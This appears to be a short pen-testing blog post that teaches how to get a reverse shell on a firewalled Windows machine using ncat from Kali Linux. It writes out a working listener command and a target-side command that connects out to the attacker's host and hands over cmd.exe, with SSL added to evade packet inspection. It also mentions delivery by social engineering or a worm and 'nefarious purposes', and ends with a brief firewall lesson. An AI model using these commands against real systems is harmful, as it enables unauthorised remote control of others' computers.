Reverse Shell with Ncat
Kali Linux is the defacto for pen testing. While any linux distro (or OS) can work for backdooring into networks, its quickest to just download a Kali Linux iso. It comes with most of the pen testing tools (some of them cost money but most are free) to get you up and running:
Lets not waste time, we have a windows machine to administer (or connect to for nefarious purposes). Let's say the windows machine is behind a firewall with all inbound connections blocked as shown below:
This will prevent us from doing a bind shell with windows, but not a reverse shell. To create a reverse shell, let's have our kali linux machine listen on an unused well known port, 443:
ncat -lvp 443 --ssl
The -lvp command means listen verbosely on port 443. --ssl will encrypt all incoming traffic (note ssl is deprecated as of ncat 7.6. To use this option, ncat 7.5 should be installed). By encrypting our traffic, it will make it difficult, albeit not impossible, to eavesdrop on our connection. It will also allow us to possibly bypass some firewall deep packet inspection filters too.
Now let's have our target machine connect to kali linux. If we run the command ifconfig on Kali, we can obtain our IPv4 address. The payload, whether it be through social engineering tactics, a worm, excreta, would execute a windows shell. This can be done with the -e command followed by the shell executable:
ncat -nv <IPv4 Addr> 443 -e cmd.exe --ssl
The -nv followed by the IPv4 address says to connect to port 443 without resolving hostnames via dns. -e will then execute the windows command prompt and --ssl completes the ssl encryption.
At this point, the kali linux machine should have a connection to the windows machine and should be able to execute windows commands.
Lesson learned:
Outbound traffic can be just as malicious as inbound traffic. From a systems administrator standpoint it is important to keep this in mind when setting up Firewall rules. Take time to create bind and reverse shells, and check out the link below for a deeper description:
Comments
Post a Comment